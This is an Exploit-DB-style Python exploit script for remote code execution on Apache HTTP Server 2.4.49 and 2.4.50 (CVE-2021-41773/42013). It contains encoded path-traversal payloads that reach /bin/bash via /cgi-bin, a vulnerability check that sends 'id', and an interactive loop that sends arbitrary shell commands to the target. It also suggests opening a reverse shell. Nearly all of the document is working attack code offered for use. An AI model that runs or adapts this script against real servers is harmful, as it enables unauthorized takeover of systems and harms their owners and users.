# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (

1.  
2. # Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
3. # Date: 11/11/2021
4. # Exploit Author: Valentin Lobstein
5. # Vendor Homepage: https://apache.org/
6. # Software Link: https://github.com/Balgogan/CVE-2021-41773
7. # Version: Apache 2.4.49/2.4.50 (CGI enabled)
8. # Tested on: Debian GNU/Linux
9. # CVE : CVE-2021-41773 / CVE-2021-42013
10. # Credits : Lucas Schnell
11.  
12.  
13. #!/usr/bin/env python3
14. #coding: utf-8
15.  
16. import os
17. import re
18. import sys
19. import time
20. import requests
21. from colorama import Fore,Style
22.  
23.  
24. header = '''\033[1;91m
25.  
26. ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
27. ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
28. ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
29. ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
30. ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
31. ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
32. ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
33. ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
34. ''' + Style.RESET_ALL
35.  
36.  
37. if len(sys.argv) < 2 :
38. print( 'Use: python3 file.py ip:port ' )
39. sys.exit()
40.  
41. def end():
42. print("\t\033[1;91m[!] Bye bye !")
43. time.sleep(0.5)
44. sys.exit(1)
45.  
46. def commands(url,command,session):
47. directory = mute_command(url,'pwd')
48. user = mute_command(url,'whoami')
49. hostname = mute_command(url,'hostname')
50. advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
51. command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
52. command = f"echo; {command};"
53. req = requests.Request('POST', url=url, data=command)
54. prepare = req.prepare()
55. prepare.url = url
56. response = session.send(prepare, timeout=5)
57. output = response.text
58. print(output)
59. if 'clear' in command:
60. os.system('/usr/bin/clear')
61. print(header)
62. if 'exit' in command:
63. end()
64.  
65. def mute_command(url,command):
66. session = requests.Session()
67. req = requests.Request('POST', url=url, data=f"echo; {command}")
68. prepare = req.prepare()
69. prepare.url = url
70. response = session.send(prepare, timeout=5)
71. return response.text.strip()
72.  
73.  
74. def exploitRCE(payload):
75. s = requests.Session()
76. try:
77. host = sys.argv[1]
78. if 'http' not in host:
79. url = 'http://'+ host + payload
80. else:
81. url = host + payload
82. session = requests.Session()
83. command = "echo; id"
84. req = requests.Request('POST', url=url, data=command)
85. prepare = req.prepare()
86. prepare.url = url
87. response = session.send(prepare, timeout=5)
88. output = response.text
89. if "uid" in output:
90. choice = "Y"
91. print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
92. print("[!] Sortie:\n\n" + Fore.YELLOW + output )
93. choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
94. if choice.lower() in ['','y','yes']:
95. while True:
96. commands(url,command,session)
97. else:
98. end()
99. else :
100. print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
101. except KeyboardInterrupt:
102. end()
103.  
104. def main():
105. try:
106. apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
107. apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
108. payloads = [apache2449_payload,apache2450_payload]
109. choice = len(payloads) + 1
110. print(header)
111. print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
112. while choice >= len(payloads) and choice >= 0:
113. choice = int(input('[~] Choice : '))
114. if choice < len(payloads):
115. exploitRCE(payloads[choice])
116. except KeyboardInterrupt:
117. print("\n\033[1;91m[!] Bye bye !")
118. time.sleep(0.5)
119. sys.exit(1)
120.  
121. if __name__ == '__main__':
122. main()